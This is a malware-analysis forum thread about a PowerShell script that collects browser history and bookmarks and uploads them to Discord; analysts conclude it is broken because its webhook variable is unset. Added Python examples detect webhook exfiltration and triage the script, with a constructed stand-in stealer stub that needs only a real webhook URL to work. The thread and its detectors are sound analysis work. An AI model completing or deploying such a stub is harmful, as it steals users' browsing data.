Malware Analysis: Evasive Stealer or Broken Sample?

Xeno1234
Jun 12, 2023
Possible PowerShell password stealer I came across. Marked as clean by multiple online analysis sites, but in the code it appears to take passwords and upload them to Discord. It might be broken, as multiple errors are displayed.
Could someone take a deeper look?

 
It doesn't seem like a password stealer to me. It only copies history and browser bookmarks to Temp\BrowserData.txt.

 
Didn’t test it/look at the code, but check the VT analysis:

“…Overall, the code seems to be designed to extract browser data and upload it to Discord, potentially for malicious purposes…”
 
You might be right. In the code I'm pretty sure it mentioned only bookmarks and history.

However, what should occur is that the data from BrowserData.txt is sent somewhere via Discord.
 
I’ve looked at this file a bit more and it appears to be a broken sample.

In all of the sandboxes, I'm 99% sure no Discord webhook request was made (which is how it should transfer the data). Therefore the data just stays on the system.
 
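What the missing webhook request would look like if the sample were functional, and a detector for it, as an added example that is not part of the thread or of the sample: the log lines below are constructed Zeek-style http.log records (not real telemetry), the webhook IDs and tokens in them are placeholders, and the flagged user agent follows the shape Windows PowerShell 5.1's web cmdlets send. Any POST to a Discord webhook path is worth a look; one from a PowerShell user agent is the pattern this thread is about.

```python
"""Flag Discord webhook POSTs in HTTP proxy telemetry, the request a working
version of the sample would make when it uploads BrowserData.txt."""
import re
from dataclasses import dataclass

# Constructed Zeek-style http.log lines (tab-separated):
# ts, id.orig_h, method, host, uri, user_agent, request_body_len.
# Not real telemetry; webhook IDs/tokens are placeholders.
SAMPLE_LOG = (
    "1686571201.1\t10.0.0.5\tGET\twww.example.com\t/\tMozilla/5.0\t0\n"
    "1686571202.4\t10.0.0.5\tPOST\tdiscord.com\t/api/webhooks/1234567890/abcdef\t"
    "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682\t48211\n"
    "1686571203.9\t10.0.0.7\tGET\tdiscord.com\t/api/v9/gateway\tMozilla/5.0 Discord/1.0\t0\n"
    "1686571204.2\t10.0.0.9\tPOST\tdiscordapp.com\t/api/webhooks/99/zz\tcurl/8.0\t120\n"
)

# Webhook endpoints live under discord.com or the older discordapp.com host,
# at /api/webhooks/<id>/<token> (optionally with an API version segment).
WEBHOOK_HOST = re.compile(r"^(?:[\w-]+\.)*discord(?:app)?\.com$", re.I)
WEBHOOK_PATH = re.compile(r"^/api/(?:v\d+/)?webhooks/\d+/[\w-]+", re.I)
PS_AGENT = re.compile(r"PowerShell", re.I)


@dataclass
class Alert:
    ts: str
    src: str
    host: str
    uri: str
    body_len: int
    severity: str
    reason: str


def parse(line):
    """Split one http.log record into fields (assumes the 7-column layout above)."""
    ts, src, method, host, uri, ua, blen = line.rstrip("\n").split("\t")
    return {"ts": ts, "src": src, "method": method.upper(), "host": host,
            "uri": uri, "ua": ua, "body_len": int(blen)}


def classify(rec):
    """Return an Alert for a webhook upload, None for everything else."""
    if rec["method"] != "POST":
        return None
    if not WEBHOOK_HOST.match(rec["host"]) or not WEBHOOK_PATH.match(rec["uri"]):
        return None
    if PS_AGENT.search(rec["ua"]):
        severity, reason = "high", "PowerShell POST to Discord webhook (data exfil pattern)"
    else:
        severity, reason = "medium", "POST to Discord webhook; review the originating process"
    return Alert(rec["ts"], rec["src"], rec["host"], rec["uri"], rec["body_len"],
                 severity, reason)


def scan(log_text):
    """Run the detector over a whole log and return the alerts in log order."""
    alerts = []
    for line in log_text.splitlines():
        if line.strip():
            alert = classify(parse(line))
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"[{a.severity}] {a.ts} {a.src} -> {a.host}{a.uri} ({a.body_len} bytes): {a.reason}")
```

In a sandbox report the same check reduces to looking for a POST to one of these hosts; the thread's observation that no such request appears is exactly what the detector would return on this sample.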
With this file not being obfuscated, it is quite straightforward to determine what it does, and that is copying bookmarks and history of Chrome, Firefox, Edge and Opera to BookMarks.txt and uploading this to Discord, as indicated by the PowerShell function name.

What is missing is the context where and how this PowerShell code is being used.
This part of the code references a variable $dc
$hookurl = "$dc"

This variable is not set, but it should contain the upload location for Discord. This is also the reason why it is not working. There is no evasion going on, it is just incomplete.

Without context it can be hard to determine if such a file is malicious or clean. However, in this case, I would give it a malware verdict, because I cannot imagine any legitimate reason to upload such data to Discord.

There might be a small chance that some legitimate application has an edge case for doing this, but as a malware analyst I would decide to detect this as malware until someone complains, because in all cases I have seen so far such a functionality was in context of a stealer or RAT with stealing functionality, using Discord channels to communicate and exfiltrate data.

It is odd though, that the code is not obfuscated. I can imagine this being the result of an AMSI dump, it being the code after unpacking, or being some template or example code for a malware.
 
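The point made above, that the script is incomplete rather than evasive, can be checked mechanically. What follows is an added example in Python (not code from the thread, the sample, or any analyst here) that runs a static triage over a constructed stand-in for the script: it lists the exfil-related indicators, finds every variable that is read but never assigned, and traces each -Uri argument back to its source to decide whether the upload can ever reach a destination. The stand-in script and its paths are assumptions modelled on the description in the thread; the list of PowerShell automatic variables is partial.

```python
"""Static triage of an unobfuscated PowerShell script: list the exfil-related
indicators it contains and find variables that are read but never assigned,
which is what makes a stealer stub like the one discussed non-functional."""
import re

# Constructed stand-in for the sample discussed in the thread, not the original
# code: it copies browser history/bookmarks to %TEMP% and posts the file to a
# Discord webhook whose URL comes from $dc, which is never assigned anywhere.
SAMPLE_SCRIPT = r'''
function Upload-Discord {
    param([string]$file)
    $hookurl = "$dc"
    Invoke-RestMethod -Uri $hookurl -Method Post -InFile $file
}
$out = "$env:TEMP\BrowserData.txt"
$chrome = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Bookmarks"
$edge = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\History"
Get-Content $chrome, $edge -ErrorAction SilentlyContinue | Out-File $out
Upload-Discord -file $out
'''

# Automatic/built-in variables a script never assigns itself (partial list).
AUTOMATIC = {"env", "_", "PSItem", "args", "input", "true", "false", "null", "this",
             "Host", "Error", "PSScriptRoot", "PSVersionTable", "PSBoundParameters"}

VAR = re.compile(r"\$(\w+)")                      # any $name, including inside "..." strings
ASSIGN = re.compile(r"\$(\w+)\s*=(?!=)")          # $name = ... (not ==)
PARAM = re.compile(r"\bparam\s*\((.*?)\)", re.I | re.S)
FOREACH = re.compile(r"\bforeach\s*\(\s*\$(\w+)\s+in\b", re.I)

INDICATORS = {
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks", re.I),
    "http_client": re.compile(r"Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient|HttpClient", re.I),
    "browser_artifact": re.compile(r"\\(?:Bookmarks|History|Login Data|Cookies|places\.sqlite)\b", re.I),
}


def strip_comments(script):
    script = re.sub(r"<#.*?#>", "", script, flags=re.S)  # block comments
    return re.sub(r"#[^\r\n]*", "", script)               # line comments (naive: '#' in strings too)


def assigned_variables(script):
    """Names given a value by assignment, a param() block, or a foreach loop."""
    names = set(ASSIGN.findall(script))
    for block in PARAM.findall(script):
        names.update(VAR.findall(block))
    names.update(FOREACH.findall(script))
    return names


def unassigned_variables(script):
    """Variables referenced anywhere but never assigned: they expand to empty at runtime."""
    return set(VAR.findall(script)) - assigned_variables(script) - AUTOMATIC


def find_indicators(script):
    return {name: sorted(set(rx.findall(script)))
            for name, rx in INDICATORS.items() if rx.search(script)}


def trace_uri_sources(script):
    """For every -Uri argument, report whether its value can ever be non-empty."""
    unassigned = unassigned_variables(script)
    out = []
    for m in re.finditer(r"-Uri\s+(\S+)", script, re.I):
        token = m.group(1).strip("\"'")
        if not token.startswith("$"):                     # literal URL
            out.append({"uri": token, "value": token, "resolved": True, "missing": []})
            continue
        name = token[1:]
        rhs = re.search(rf"\${name}\s*=\s*(.+)", script)  # first assignment to that variable
        value = rhs.group(1).strip() if rhs else None
        deps = (set(VAR.findall(value)) - AUTOMATIC) if value else set()
        missing = (deps & unassigned) | ({name} if name in unassigned else set())
        out.append({"uri": token, "value": value, "resolved": not missing,
                    "missing": sorted(missing)})
    return out


def triage(script):
    script = strip_comments(script)
    indicators = find_indicators(script)
    uris = trace_uri_sources(script)
    if "http_client" in indicators and any(not u["resolved"] for u in uris):
        status = "incomplete"   # upload code present, but its destination is never set
    elif "http_client" in indicators:
        status = "functional"
    else:
        status = "local-only"   # collects data but has no network code at all
    return {"status": status, "indicators": indicators, "uri_sources": uris,
            "unassigned": sorted(unassigned_variables(script))}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_SCRIPT), indent=2))
```

On the stand-in this reports status "incomplete" with $dc as the only unassigned variable, which is the same conclusion reached by hand above; substituting a real webhook URL for "$dc" flips the verdict to "functional" and the discord_webhook indicator appears, so the same script would then be a working stealer.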
I believe i've found another sample similar to this one.
Appears to be some obscure macro software, but I don't think it's legitimate. It's signed by Node JS and its name suggests it is part of their software, it references something related to Minecraft services, and it also runs a modified version of conhost whose process name relates to Raccoon Stealer.
Clean on Opentip, Sophos Intelix, Triage, and low VT detections.

Detected by Falcon Sandbox
 
Kaspersky added signatures. Fully undetected by Checkpoint Harmony yesterday.
 
Interesting detection name by Kaspersky
 
Judging from the screenshot and the configuration file contents, it is a malware-spreading hacktool.
I do not see similarity to the earlier sample.
